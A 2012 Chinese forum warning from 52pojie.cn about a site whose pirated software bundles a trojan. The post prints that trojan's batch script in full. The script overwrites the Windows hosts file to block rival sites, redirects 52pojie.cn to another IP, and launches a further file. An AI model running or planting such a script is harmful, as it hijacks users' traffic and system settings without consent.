LCG 发表于 2012-4-9 20:47

警惕假冒营销网站下载木马软件

今天管理员收到一位论坛会员的反馈,大概过程就是打开吾爱破解论坛被劫持跳转到一个营销软件站点,会员曾经在这个站点上下载过软件并执行,之后就不能正常访问了,原因就是host被垃圾软件修改了,还好360安全浏览器给出了正确的提醒。
具体的聊天记录如下:



回忆不抵流年━-   19:40:53

在吗

你的站打不开



打开的却是这个站

www.xfyxz.com

回忆不抵流年━-   19:42:43



Hmily   20:27:10
host被改了
你弄的是什么软件成这样了?
回忆不抵流年━-   20:27:27
就他们站的软件

Hmily   20:27:28
从吾爱下的?
回忆不抵流年━-   20:27:31
不是

www.xfyxz.com

这个站上的

一点就屏了

Hmily   20:29:47
光打开不会中木马的
你得把host改掉
知道怎么该吗?
发远程
我帮你弄下
回忆不抵流年━-   20:30:02


不是、

我是打开他们的软件

Hmily   20:30:22
把软件发我
回忆不抵流年━-   20:30:43
我现在删了
我找找给你

以前用过很多 他们的软件都 是HOST了 你们的打不开

今天打开他这个 却发现 点你们站 出现他们的站了

Hmily   20:31:38
真牛逼
回忆不抵流年━-   20:32:10
他们很厉害吧
Hmily   20:32:20
不是厉害,是傻逼

成功接收文件“1.rar”(3.43MB)

打开文件   打开所在文件夹
   
回忆不抵流年━-   20:33:46
现在搞软件的就他站不厚道一点软件还弹他站

看了下对方的站点,上面还有联系QQ,所以联系了下,反馈如下:


分析了下木马,在所有盗版软件里捆绑了一个批处理来修改host,内容如下:

attrib -R +A C:\windows\system32\drivers\etc\hosts
@echo off
cls
echo 127.0.0.1 localhost>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 etone.86372.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.topyingxiao.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.178yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.52pjz.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.52pojie.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.5zkc.cn>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.52pojie.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pojie8.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.loveji.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hctcj.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jsssz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.etonesoft.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lanmao2010.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jfw888.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xm930.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vip029.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.94061793.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.6688yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xuexi581.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yx990.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.918yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.gollb.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfaruanjian007.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.999yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.diandianfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.54sr.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.xywaz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.99yxrj.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qisefeng.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.down60.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yx0225.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.328yxsoft.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.ch2007.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.wxyingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.seofafa.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.21vk.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yingxiaoruanjian.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.goodun.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.smoke08.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 vunseo.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vunseo.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pj8.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pj8.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jueaivip.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 topyingxiao.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 6688yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 52pjz.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 lanmao2010.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 xuexi581.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 918yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 xm930.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 94061793.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 178yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 qisefeng.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pojie8.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfa.so>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.shuanglaba.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hzyxtl.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.schkj.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.cnyingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.591ppp.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hn911.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.wwqunfa.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.jgrjj.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vip029.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.taoxin5.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qq520.cc>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.5588yingxiao.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqqunfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.chinapjz.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfaw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.only-3.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 hctcj.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.u68688.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.down60.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 u68688.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 pjrjyxw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.pjrjyxw.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.21vk.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.haodisoft.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqsender.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.shunfa365.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qunfa555.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.daysay.cn>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lantqf.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.11ruanjian.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.qqjiaqun.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.east1688.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.diandianfa.net>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.li0107.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 li0107.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 www.huacolor.com>>%systemroot%\system32\drivers\etc\hosts
echo 113.10.149.145 bbs.huacolor.com>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 service.suomali.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 www.suomali.net>>%systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 services.suomali.net>>%systemroot%\system32\drivers\etc\hosts
attrib +R -A C:\windows\system32\drivers\etc\hosts
ping -n 2 127.0.0.1 >nul
startSoft_Safe.dat
exit






沐浴花香 发表于 2012-4-9 20:47


前排留名。。。。。不错啦,拿走了。

陈逸希ChenStyle 发表于 2012-4-9 20:51

是啊。在论坛发软件带站连接就没说你了, 还这么那啥 ,。

皈依我佛 发表于 2012-4-9 20:55

无良的黑心商贩

Peace 发表于 2012-4-9 21:00


想了解一下360浏览器是如何提醒的?

Hmily 发表于 2012-4-9 21:00

得寸进尺,来吾爱下免费破解软件,再捆绑木马盗版到自己网站去卖,RPBH!

Kido 发表于 2012-4-9 21:05

BS之。。。

wgz001 发表于 2012-4-9 21:05

上网就用360   谁用谁知道   {:1_918:}

willJ 发表于 2012-4-9 21:06

用360全套的无压力

zshwww9187 发表于 2012-4-9 21:11

黑阔们,上吧!{:301_1001:}
页: [1] 2 3 4 5 6 7
查看完整版本: 警惕假冒营销网站下载木马软件


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn